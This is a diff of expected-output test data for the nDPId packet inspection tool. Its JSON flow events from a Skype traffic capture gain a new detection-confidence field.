 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":793,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659834,"flow_last_seen":1431970659834,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970659834,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.144","src_port":13021,"dst_port":40016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":793,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":1,"flow_last_seen":1431970659834,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"ts_msec":1431970659834,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1elAAAEARHtbAqAEinTeCkDLdnFAAIfN1e0UCt0zo\/WrZ+Zw8Ki6+SR8vgG1TLjatCw=="}
-00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":793,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659834,"flow_last_seen":1431970659834,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970659834,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.144","src_port":13021,"dst_port":40016,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":793,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659834,"flow_last_seen":1431970659834,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970659834,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.144","src_port":13021,"dst_port":40016,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":794,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659834,"flow_last_seen":1431970659834,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970659834,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":794,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":1,"flow_last_seen":1431970659834,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"ts_msec":1431970659834,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/fyEAAEARaHbAqAEinTg0FDLdnGEAK5aLe0cCmWiuCofYyBz6GXTZdvI4LweQLKgxsl8j0KcXdBMS+c8="}
-00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":794,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659834,"flow_last_seen":1431970659834,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970659834,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":794,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659834,"flow_last_seen":1431970659834,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970659834,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":795,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659835,"flow_last_seen":1431970659835,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970659835,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.144","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":795,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":124,"flow_packet_id":1,"flow_last_seen":1431970659835,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"ts_msec":1431970659835,"pkt":"0NQSxnP1PBXCt3IOCABFAABBTDEAAEAR4+jAqAEinTfrkDLdnGAALTL8e0kC17QicxuXB5auWkNIni8RcFzpWBK6wb+NIPIUjtvt0ICuYw=="}
-00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":795,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659835,"flow_last_seen":1431970659835,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970659835,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.144","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":795,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659835,"flow_last_seen":1431970659835,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970659835,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.144","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":796,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659835,"flow_last_seen":1431970659835,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970659835,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.165","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":796,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":125,"flow_packet_id":1,"flow_last_seen":1431970659835,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1431970659835,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+n20AAEARW\/XAqAEib91NpTLdnEQAKqfKe0sCA3KviLJG1lAzDVoG9idWXcbF4pfswWYweShFk+5UVw=="}
-00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":796,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659835,"flow_last_seen":1431970659835,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970659835,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.165","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":796,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659835,"flow_last_seen":1431970659835,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970659835,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.165","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":797,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659835,"flow_last_seen":1431970659835,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431970659835,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":797,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":126,"flow_packet_id":1,"flow_last_seen":1431970659835,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"ts_msec":1431970659835,"pkt":"0NQSxnP1PBXCt3IOCABFAAA71A4AAEARxQ\/AqAEinTeCkjLdnGEAJ5FDe00CRUi6WS8h8mPi8e9oMy1XIZqCitDbn3NkpyCi9w=="}
-00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":797,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659835,"flow_last_seen":1431970659835,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431970659835,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":40033,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":797,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970659835,"flow_last_seen":1431970659835,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431970659835,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":40033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":798,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":2,"flow_last_seen":1431970659837,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431970659837,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGxWVv3U2vwKgBIgG7yDJl2k5Wodh94KASOJCbeAAAAgQFrAQCCApNo+OiPjHnRwEDAwk="}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":799,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":3,"flow_last_seen":1431970659837,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431970659837,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0vZ1AAEAG\/c\/AqAEib91Nr8gyAbuh2H3gZdpOV4AQECzxPQAAAQEICj4x6KxNo+Oi"}
 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":801,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":2,"flow_last_seen":1431970660037,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431970660037,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGK0hABBemwKgBIpxdyDOxwWA5m455IaASOJAGLQAAAgQFrAQCCApMQvFqPjHoqQEDAwk="}
@@ -448,59 +448,59 @@
 01764{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":810,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":3,"flow_last_seen":1431970660162,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1020,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1020,"pkt_l4_len":986,"ts_msec":1431970660162,"pkt":"0NQSxnP1PBXCt3IOCABFAAPuXRVAAEAGCB7AqAEibKCjbMgWAbuJlSqsld0tgYAYEABN6wAAAQEICj4x6e5hgM9\/FwMBACBZ+Bs2C0RS\/3DQyGZlP7ulpgg75GP5qHQjRGtchozZwxcDAQOQsZo+mdYHDHNhryD2tBwTy4NvJ6ZcB90CLvDuO3oQpA0NMcbrVNY5NoFZnnz0+pHYPlsxDiwS7sQ7DD24qzDLtHgUUDp9pF8b6+msIHWzLPEMF8+q7Hjw2nVwpow1oTrrramWFNK3HRWRwVplTmpzcS1pGJ+gQZaUVDp8kdn+ynK0M3\/CdKLtFbx\/CK0N6q8IWYmbmyMU5F09Bl18WwyIuujJA\/tFE5EWnSsW2X+zhBTRq9ZI\/U83NB7qUlABm1QnhF8bT1juNjzO0mWZlZFkQTsnKvttlKSdtcMJ5dRpAqaA7SHB9Yz5a49nYhRO+wwnisVOiZGDLnrE+5oMmTb9C9ZKB5wr20bAzzEkorS06bd9G1Av+Y\/0Lf00cKMeFW4\/NlQQW2HF8cVYvIZB6\/NQlnUH0R\/vBxkZqKxj1qnAgjVDBnssNNPdbIKrHQdoBZOJ1oafA1nh+V4oZbi2LQd\/E9fD9yqlUtsVwzp7nZEacc3p6m0hUW7kAV1Xt3xzsImKJZZ7j62VNDmcm6WWPL29PEP1oF9dSb1pTuKLUUHMDB7w2YxBjm\/ZP6TnMxz3NjZHO6QfscWBsVMMmj8RnOruQ3QLIGDLGpDyMgBlDBTqoOiUC8PgBmSlGAPlhRVT95WOL1mqA6t0DBes+DH8fSZeIVvA3K7YCF4kypftCQiLFXrErN2XOvSvejhBSuUJcdOOdCNOjGoPoLOWoqVEN7LXgsXaWfdoBTx79TQIPG1as39Z7fRVj+fkKyD61xYiyqgtf1\/WpWVrCyTwKovWQ0C6GFD907jbLAxlD1UmA3abuFNLCt\/acdLUjndrKvuooQD6IYCIwrJi8YL7kKb0+32ovATeOhPAdbLgWa9wSUgKddlog7emY+Y\/Esr+n4M8E4bdevnoTb75M4ozaSVREGSwce5U3XhhEIMmQQkznZpj46Kf9jFwDbzxK7wZgQZ21paket5\/tiCE9zIgnjVS0wcx5TiuHX4egIJeH+3peLDINK2jmmDw6Tm7kJ69c9scP9Gd7zhw6XHG1S0IW6aTMTHKdqb5u2V1sEk8osIRYPNxQKLPY35nEHSqNlCZVyRPLhgWH+JjqVOEwNbhNBOOCigDYop+TfjfQDQrLH+IrQWISQBJnU69BfsNuFeEx3PLuH6o+oBZH+QNZRQR6lheial\/vXPOSCwP4oQlK11s+sl5+hhICPKCRXfAUncH7wDdsLSe"}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":819,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970660848,"flow_last_seen":1431970660848,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970660848,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":819,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":128,"flow_packet_id":1,"flow_last_seen":1431970660848,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"ts_msec":1431970660848,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6TMEAAEARsjLAqAEib91KGDLdnGAAJk69e08C7Jn\/msaru979SjBYNnh0LMk7Ko\/+l6KrptIV"}
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":819,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970660848,"flow_last_seen":1431970660848,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970660848,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":819,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970660848,"flow_last_seen":1431970660848,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970660848,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":820,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970660848,"flow_last_seen":1431970660848,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431970660848,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.160","src_port":13021,"dst_port":40016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":820,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":129,"flow_packet_id":1,"flow_last_seen":1431970660848,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1431970660848,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4j48AAEARa97AqAEib91NoDLdnFAAJOlwe1ECSObCw6nUMfh7bnqIU3mueprtSIlR2AyZTQ=="}
-00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":820,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970660848,"flow_last_seen":1431970660848,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431970660848,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.160","src_port":13021,"dst_port":40016,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":820,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970660848,"flow_last_seen":1431970660848,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431970660848,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.160","src_port":13021,"dst_port":40016,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":831,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970661447,"flow_last_seen":1431970661447,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431970661447,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":51253,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":831,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":1,"flow_last_seen":1431970661447,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431970661447,"pkt":"0NQSxnP1PBXCt3IOCABFAABAYfhAAEAGv0vAqAEiQAQXpsg1Abs0yMrkAAAAALAC\/\/8mywAAAgQFtAEDAwUBAQgKPjHu7gAAAAAEAgAA"}
 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":833,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":2,"flow_last_seen":1431970661649,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431970661649,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGK0hABBemwKgBIgG7yDUuR6JLNMjK5aASOJDvYAAAAgQFrAQCCApMQvL8PjHu7gEDAwk="}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":834,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":3,"flow_last_seen":1431970661649,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431970661649,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0asRAAEAGtovAqAEiQAQXpsg1Abs0yMrlLkeiTIAQECxFxAAAAQEICj4x77VMQvL8"}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":854,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970661855,"flow_last_seen":1431970661855,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431970661855,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.28","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":854,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":131,"flow_packet_id":1,"flow_last_seen":1431970661855,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431970661855,"pkt":"0NQSxnP1PBXCt3IOCABFAABAgx0AAEARe8zAqAEib91KHDLdnFoALOnqe1MCA8GYjWWu9fDS5z8O1HnUzLtilbW9STWNzZ4dxAZIYogR"}
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":854,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970661855,"flow_last_seen":1431970661855,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431970661855,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.28","src_port":13021,"dst_port":40026,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":854,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970661855,"flow_last_seen":1431970661855,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431970661855,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.28","src_port":13021,"dst_port":40026,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":855,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970661855,"flow_last_seen":1431970661855,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431970661855,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":855,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":132,"flow_packet_id":1,"flow_last_seen":1431970661855,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"ts_msec":1431970661855,"pkt":"0NQSxnP1PBXCt3IOCABFAAA3uKMAAEAR4H7AqAEinTeCkjLdgQkAI\/pPe1UCb1OUWk4YvTHMO4jKAgG4ML6WHkkTPHmm"}
